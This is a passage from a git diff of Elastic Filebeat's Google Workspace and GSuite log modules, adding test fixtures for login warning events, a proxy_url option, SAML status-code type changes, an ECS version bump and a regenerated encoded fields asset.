"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_login_less_secure_app\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 853, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "suspicious_programmatic_login", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"suspicious_programmatic_login\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "info" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 1316, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "account_disabled_generic", @@ -223,6 +391,63 @@ "user.target.email": "foo@elastic.co", "user.target.name": "foo" }, + { + "@timestamp": "2020-10-02T15:00:00.000Z", + "event.action": "account_disabled_hijacked", + "event.category": [ + "authentication" + ], + "event.dataset": "google_workspace.login", + "event.id": "1", + "event.module": "google_workspace", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"login\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"account_warning\",\"name\":\"account_disabled_hijacked\",\"parameters\":[{\"name\":\"affected_email_address\",\"value\":\"foo@elastic.co\"},{\"name\":\"login_timestamp\",\"intValue\":1593695305123456}]}}", + "event.provider": "login", + "event.start": "2020-07-02T13:08:25.123Z", + "event.type": [ + "user", + "change" + ], + "fileset.name": "login", + "google_workspace.actor.type": "USER", + "google_workspace.event.type": "account_warning", + "google_workspace.kind": "admin#reports#activity", + "google_workspace.login.affected_email_address": "foo@elastic.co", + "google_workspace.organization.domain": "elastic.com", + "input.type": "log", + "log.offset": 2992, + "organization.id": "1", + "related.ip": [ + "98.235.162.24" + ], + "related.user": [ + "foo" + ], + "service.type": "google_workspace", + "source.as.number": 7922, + "source.as.organization.name": "Comcast Cable Communications, LLC", + "source.geo.city_name": "State College", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 40.7957, + "source.geo.location.lon": -77.8618, + "source.geo.region_iso_code": "US-PA", + "source.geo.region_name": "Pennsylvania", + "source.ip": "98.235.162.24", + "source.user.domain": "bar.com", + "source.user.email": "foo@bar.com", + "source.user.id": "1", + "source.user.name": "foo", + "tags": [ + "forwarded" + ], + "user.domain": "bar.com", + "user.id": "1", + "user.name": "foo", + "user.target.domain": "elastic.co", + "user.target.email": "foo@elastic.co", + "user.target.name": "foo" + }, { "@timestamp": "2020-10-02T15:00:00.000Z", "event.action": "gov_attack_warning", diff --git a/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml b/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml index b7e9efc0926..fc0adfcb55c 100644 --- a/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml +++ b/x-pack/filebeat/module/google_workspace/saml/_meta/fields.yml @@ -18,10 +18,10 @@ description: > User orgunit. - name: status_code - type: long + type: keyword description: > SAML status code. - name: second_level_status_code - type: long + type: keyword description: > SAML second level status code. diff --git a/x-pack/filebeat/module/google_workspace/saml/config/config.yml b/x-pack/filebeat/module/google_workspace/saml/config/config.yml index da0641282fc..f8e64ef624b 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/saml/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js index 9a779f8dd88..705db7f2f1e 100644 --- a/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js +++ b/x-pack/filebeat/module/google_workspace/saml/config/pipeline.js @@ -32,14 +32,7 @@ var saml = (function () { // all saml event parameters are strings. // for this reason we know for sure they are in the 'value' field. // https://developers.google.com/admin-sdk/reports/v1/appendix/activity/saml - switch (p.name) { - case "status_code": - case "second_level_status_code": - evt.Put("google_workspace.saml."+p.name, parseInt(p.value)); - break; - default: - evt.Put("google_workspace.saml."+p.name, p.value); - } + evt.Put("google_workspace.saml."+p.name, p.value); }); evt.Delete("json.events.parameters"); diff --git a/x-pack/filebeat/module/google_workspace/saml/manifest.yml b/x-pack/filebeat/module/google_workspace/saml/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/saml/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/saml/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log index 678193e25d5..ed672b58a56 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log @@ -1,2 +1,2 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"400"},{"name":"saml_status_code","value":"400"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"400"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_failure","parameters":[{"name":"application_name","value":"app"},{"name":"failure_type","value":"failure_app_not_configured_for_user"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_second_level_status_code","value":"SUCCESS_URI"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:01Z","uniqueQualifier":1,"applicationName":"saml","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"login","name":"login_success","parameters":[{"name":"application_name","value":"app"},{"name":"initiated_by","value":"idp"},{"name":"orgunit_path","value":"ounit"},{"name":"saml_status_code","value":"SUCCESS_URI"}]}} diff --git a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json index 90f6463ce34..d6f84e5c64f 100644 --- a/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/saml/test/saml-test.json.log-expected.json @@ -9,7 +9,7 @@ "event.dataset": "google_workspace.saml", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"400\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_failure\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"failure_type\",\"value\":\"failure_app_not_configured_for_user\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_second_level_status_code\",\"value\":\"SUCCESS_URI\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "failure", "event.provider": "saml", "event.type": [ @@ -24,8 +24,8 @@ "google_workspace.saml.failure_type": "failure_app_not_configured_for_user", "google_workspace.saml.initiated_by": "idp", "google_workspace.saml.orgunit_path": "ounit", - "google_workspace.saml.second_level_status_code": 400, - "google_workspace.saml.status_code": 400, + "google_workspace.saml.second_level_status_code": "SUCCESS_URI", + "google_workspace.saml.status_code": "SUCCESS_URI", "input.type": "log", "log.offset": 0, "organization.id": "1", @@ -68,7 +68,7 @@ "event.dataset": "google_workspace.saml", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"400\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:01Z\",\"uniqueQualifier\":1,\"applicationName\":\"saml\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"application_name\",\"value\":\"app\"},{\"name\":\"initiated_by\",\"value\":\"idp\"},{\"name\":\"orgunit_path\",\"value\":\"ounit\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}}", "event.outcome": "success", "event.provider": "saml", "event.type": [ @@ -82,9 +82,9 @@ "google_workspace.saml.application_name": "app", "google_workspace.saml.initiated_by": "idp", "google_workspace.saml.orgunit_path": "ounit", - "google_workspace.saml.status_code": 400, + "google_workspace.saml.status_code": "SUCCESS_URI", "input.type": "log", - "log.offset": 606, + "log.offset": 622, "organization.id": "1", "related.ip": [ "98.235.162.24" diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml index 2219d3ba1a0..33b6cf987a0 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/user_accounts/manifest.yml b/x-pack/filebeat/module/google_workspace/user_accounts/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/user_accounts/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/user_accounts/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/admin/config/config.yml b/x-pack/filebeat/module/gsuite/admin/config/config.yml index 12e3730dc93..8313c8d1dc2 100644 --- a/x-pack/filebeat/module/gsuite/admin/config/config.yml +++ b/x-pack/filebeat/module/gsuite/admin/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/admin/manifest.yml b/x-pack/filebeat/module/gsuite/admin/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/admin/manifest.yml +++ b/x-pack/filebeat/module/gsuite/admin/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/drive/config/config.yml b/x-pack/filebeat/module/gsuite/drive/config/config.yml index 80583ee31b6..cd16f359b5b 100644 --- a/x-pack/filebeat/module/gsuite/drive/config/config.yml +++ b/x-pack/filebeat/module/gsuite/drive/config/config.yml @@ -23,6 +23,10 @@ date_cursor.initial_interval: {{ .initial_interval }} pagination.id_field: nextPageToken pagination.url_field: pageToken +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + {{ else if eq .input "file" }} type: log paths: @@ -39,7 +43,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gsuite-common diff --git a/x-pack/filebeat/module/gsuite/drive/manifest.yml b/x-pack/filebeat/module/gsuite/drive/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/gsuite/drive/manifest.yml +++ b/x-pack/filebeat/module/gsuite/drive/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/gsuite/fields.go b/x-pack/filebeat/module/gsuite/fields.go index 1d4d320cd3b..b25ae2dec1f 100644 --- a/x-pack/filebeat/module/gsuite/fields.go +++ b/x-pack/filebeat/module/gsuite/fields.go @@ -19,5 +19,5 @@ func init() { // AssetGsuite returns asset data. // This is the base64 encoded gzipped contents of module/gsuite. func AssetGsuite() string { - return "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" + return "eJzkXFtz3Dayfvev6EoefE4qGtXJox5OldaaOK5IlkqSs5va2qIwRJNEBAI0AM549tdv4cIRZ4bkXEDZk6xe7BoS39do3Lob3TyDZ1xeQK5rZvANgGGG4wV853/47g0ARZ0qVhkmxQX8/xsACG/DjaQ1t40yhpzqC/fsDAQpsYVo/yhmpOYmcS9eQEa4bh6ZZWXfVrKuVi9vEdq/955UV5iyjKWBdPJm9cKNVAhMZFKVxDYGMpO12WwAKREwQ8hkLSgQA4Uxlb44P6c4Ry4rVHqSS5lznKSyPCe0ZOJM0+dzhZVURp/P/+9cYYYKRYrnJDVszgxDfc6ZNkGWtj7aOiGpkWpie7x61CjgGZcLqWjr9x412L/HAl0zkFnAfLP2/DfCa2x6erH2COCHTw/T+x8u4FJIU6CCWqMCJsAUCJqUCFSWhInJZrPpPx6n9x8vr5OmvW8pa6MZRde8p+Wv09/d+0KKs6IuiWiE7tbPMy7j1HMr+BIqhRqFgUWBAp5eNP8ETMPTr9Pfnybwzk8FK/pTKoWuS1TJMy6frGLtrwo/16iNVJBJBbeXtSngp+tbuLz70DzTIBUQAYyiMCxj6N9VciYNkDSVtTB6u6s4R2FGngrvH9wKcdA/QkmqCilkSpbwxAyW+p//mrhn9j9BFX7YpWI5E4RDRZZcEro+glOSFpAxjhqNm1MFmSMQoCxzy8CAfSAzmPtpZ7vPrAB2PVI0hPGvsursH34hZWU3MFJTZr4PLy631P/MBB1P8X46aFmrFDcUb4n21PPNCetLqpwI9m+3r078Mo9Tn1egRwJTEGOXJckyTA1SmC3D8rOdeavDatneL2y3t+RonyXQsRuvIVQVZ6nvFlJm/90Qs69vW/2z/WlWoEea7KS0v8TwtbDeaoe/mxMFmXHchD6INkC